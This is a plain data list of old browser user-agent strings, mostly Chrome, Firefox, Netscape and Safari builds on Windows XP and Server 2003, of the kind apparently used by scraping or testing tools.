-Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.206.0 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.206.1 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.208.0 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.209.0 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.0 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.2 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.4 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.7 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.212.0 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML,like Gecko) Chrome/3.0.195.27 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.213.0 Safari/532.1 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.213.1 Safari/532.1 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.0 Safari/532.1 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.3 Safari/532.1 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.4 Safari/532.1 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.5 Safari/532.1 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.6 Safari/532.2 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.0 Safari/532.2 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.12 Safari/532.2 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.3 Safari/532.2 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.4 Safari/532.2 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.5 Safari/532.2 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.7 Safari/532.2 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.223.1 Safari/532.2 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.223.2 Safari/532.2 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.223.3 Safari/532.2 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.223.4 Safari/532.2 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.288.1 Safari/532.8 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) 
AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.2 Safari/533.2 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.353.0 Safari/533.3 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.355.0 Safari/533.3 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.356.0 Safari/533.3 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.357.0 Safari/533.3 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.8 (KHTML, like Gecko) Chrome/6.0.397.0 Safari/533.8 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/7.0.548.0 Safari/534.10 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.0 Safari/534.13 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.15 Safari/534.13 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.599.0 Safari/534.13 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.601.0 Safari/534.14 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.602.0 Safari/534.14 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.600.0 Safari/534.14 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.634.0 Safari/534.16 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.134 Safari/534.16 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.18 (KHTML, like Gecko) Chrome/11.0.661.0 Safari/534.18 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.19 (KHTML, like Gecko) Chrome/11.0.661.0 Safari/534.19 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.21 (KHTML, like Gecko) Chrome/11.0.678.0 Safari/534.21 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.21 (KHTML, like Gecko) Chrome/11.0.682.0 Safari/534.21 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.458.1 Safari/534.3 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.461.0 Safari/534.3 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.53 Safari/534.3 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.6 (KHTML, like Gecko) Chrome/7.0.500.0 Safari/534.6 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.9 (KHTML, like Gecko) Chrome/7.0.531.0 Safari/534.9 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax) -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.2) Gecko/20040804 Netscape/7.2 (ax) -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20050519 Netscape/8.0.1 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) 
Gecko/20060127 Netscape/8.1 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.4) Gecko/20060516 SeaMonkey/1.0.2 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.6) Gecko/20060728 SeaMonkey/1.0.4 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20060918 Firefox/2.0 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061003 Firefox/2.0 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1a3) Gecko/20060527 BonEcho/2.0a3 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1b1) Gecko/20060708 Firefox/2.0b1 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1b2) Gecko/20060821 Firefox/2.0b2 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.0 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13 (.NET CLR 3.5.30729) FBSMTWB -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.16) Gecko/2009120208 Firefox/3.0.16 FBSMTWB -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6pre) Gecko/2008121605 Firefox/3.0.6pre -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6pre) Gecko/2009011606 Firefox/3.1 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.0 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.11 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.16) Gecko/20101130 AskTbPLTV5/3.8.0.12304 Firefox/3.5.16 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.16) Gecko/20101130 Firefox/3.5.16 GTB7.1 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 MRA 5.5 (build 02842) Firefox/3.5.5 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 MRA 5.5 (build 02842) Firefox/3.5.5 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 (.NET CLR 3.5.30729) FBSMTWB -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 GTB6 (.NET CLR 3.5.30729) FBSMTWB -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.6) Gecko/20091201 MRA 5.5 (build 02842) Firefox/3.5.6 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.6) Gecko/20091201 MRA 5.5 (build 02842) Firefox/3.5.6 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20091221 MRA 5.5 (build 02842) Firefox/3.5.7 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1b3pre) Gecko/20090213 Firefox/3.0.1b3pre -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1b4) Gecko/20090423 Firefox/3.5b4 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1b4pre) Gecko/20090401 Firefox/3.5b4pre -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1b4pre) Gecko/20090409 Firefox/3.5b4pre -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1b5pre) Gecko/20090517 Firefox/3.5b4pre (.NET CLR 
3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.0.16 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.25 (jaunty) Firefox/3.8 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2b4) Gecko/20091124 Firefox/3.6b4 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9b1) Gecko/2007110703 Firefox/3.0b1 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9b3) Gecko/2008020514 Firefox/3.0b3 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9b4pre) Gecko/2008020708 Firefox/3.0b4pre -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9b5pre) Gecko/2008030706 Firefox/3.0b5pre -Mozilla/5.0 (Windows; U; Windows NT 5.1; es-AR; rv:1.9b2) Gecko/2007121120 Firefox/3.0b2 -Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6 -Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko/2009120208 Firefox/3.0.16 FBSMTWB -Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 5.1; fa; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7 -Mozilla/5.0 (Windows; U; Windows NT 5.1; fi-FI) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16 -Mozilla/5.0 (Windows; U; Windows NT 5.1; fr-FR) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16 -Mozilla/5.0 (Windows; U; Windows NT 5.1; fr-be; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13 -Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 ( .NET CLR 3.5.30729; .NET4.0C) -Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1b3) Gecko/20090305 Firefox/3.1b3 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.2b4) Gecko/20091124 Firefox/3.6b4 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.2b5) Gecko/20091204 Firefox/3.6b5 -Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9b5) Gecko/2008032620 Firefox/3.0b5 -Mozilla/5.0 (Windows; U; Windows NT 5.1; hu-HU) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16 -Mozilla/5.0 (Windows; U; Windows NT 5.1; hu; rv:1.9.1.11) Gecko/20100701 Firefox/3.5.11 -Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.9.0.16) Gecko/2009120208 Firefox/3.0.16 FBSMTWB -Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.9.1b2) Gecko/20081201 Firefox/3.1b2 -Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.9.2.11) Gecko/20101012 Firefox/3.6.11 ( .NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6 ( .NET CLR 3.5.30729; .NET4.0E) -Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.9b2) Gecko/2007121120 Firefox/3.0b2 -Mozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 GTB7.0 ( .NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 -Mozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 GTB7.0 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.9.1b2) Gecko/20081201 Firefox/3.1b2 -Mozilla/5.0 (Windows; U; 
Windows NT 5.1; ja; rv:1.9.2a1pre) Gecko/20090402 Firefox/3.6a1pre (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.9b5) Gecko/2008032620 Firefox/3.0b5 -Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9.2.4) Gecko/20100523 Firefox/3.6.4 -Mozilla/5.0 (Windows; U; Windows NT 5.1; lt; rv:1.9b4) Gecko/2008030714 Firefox/3.0b4 -Mozilla/5.0 (Windows; U; Windows NT 5.1; nb-NO) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16 -Mozilla/5.0 (Windows; U; Windows NT 5.1; nb-NO; rv:1.9.2.4) Gecko/20100611 Firefox/3.6.4 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0 -Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5 -Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 (.NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.9.1b3) Gecko/20090305 Firefox/3.1b3 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.9b4) Gecko/2008030714 Firefox/3.0b4 -Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2 GTB6 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16 -Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13 -Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 -Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 GTB6 -Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.1.11) Gecko/20100701 Firefox/3.5.11 ( .NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 -Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16 -Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.9.2.7) Gecko/20100713 Firefox/3.6.7 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 5.1; ru-RU) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16 -Mozilla/5.0 (Windows; U; Windows NT 5.1; ru-RU) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5 -Mozilla/5.0 (Windows; U; Windows NT 5.1; ru-RU; rv:1.9.1.4) Gecko/20091016 Firefox/3.5.4 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1b3) Gecko/20090305 Firefox/3.1b3 -Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9b3) Gecko/2008020514 Firefox/3.0b3 -Mozilla/5.0 (Windows; U; Windows NT 5.1; sv-SE) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16 -Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0E) -Mozilla/5.0 (Windows; U; Windows NT 5.1; uk; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 -Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16 -Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19.1 -Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/533.16 (KHTML, like Gecko) Chrome/5.0.335.0 Safari/533.16 -Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1b4) Gecko/20090423 Firefox/3.5b4 -Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1b4) Gecko/20090423 Firefox/3.5b4 (.NET CLR 3.5.30729) 
-Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2.4) Gecko/20100503 Firefox/3.6.4 ( .NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2.4) Gecko/20100513 Firefox/3.6.4 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 -Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9b3) Gecko/2008020514 Firefox/3.0b3 -Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9b4) Gecko/2008030714 Firefox/3.0b4 -Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16 -Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5 -Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 -Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 GTB6 -Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW; rv:1.9.2.4) Gecko/20100611 Firefox/3.6.4 GTB7.0 ( .NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW; rv:1.9b4) Gecko/2008030714 Firefox/3.0b4 -Mozilla/5.0 (Windows; U; Windows NT 5.2; de-DE) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19.1 -Mozilla/5.0 (Windows; U; Windows NT 5.2; de-DE) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.202.2 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-CA; rv:1.9.2.4) Gecko/20100523 Firefox/3.6.4 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-GB; rv:1.9.2.9) Gecko/20100824 Firefox/3.6.9 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.27 Safari/525.13 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.29 Safari/525.13 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.30 Safari/525.13 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.6 Safari/525.13 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.2.151.0 Safari/525.19 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.3.154.6 Safari/525.19 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.43 Safari/525.19 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.53 Safari/525.19 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.59 Safari/525.19 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/530.4 (KHTML, like Gecko) Chrome/2.0.172.0 Safari/530.4 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.43 Safari/530.5 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/531.3 (KHTML, like Gecko) Chrome/3.0.193.2 Safari/531.3 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.21 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.6 
Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.202.0 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.203.2 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.206.1 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.210.0 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.212.0 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.213.0 Safari/532.1 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.213.1 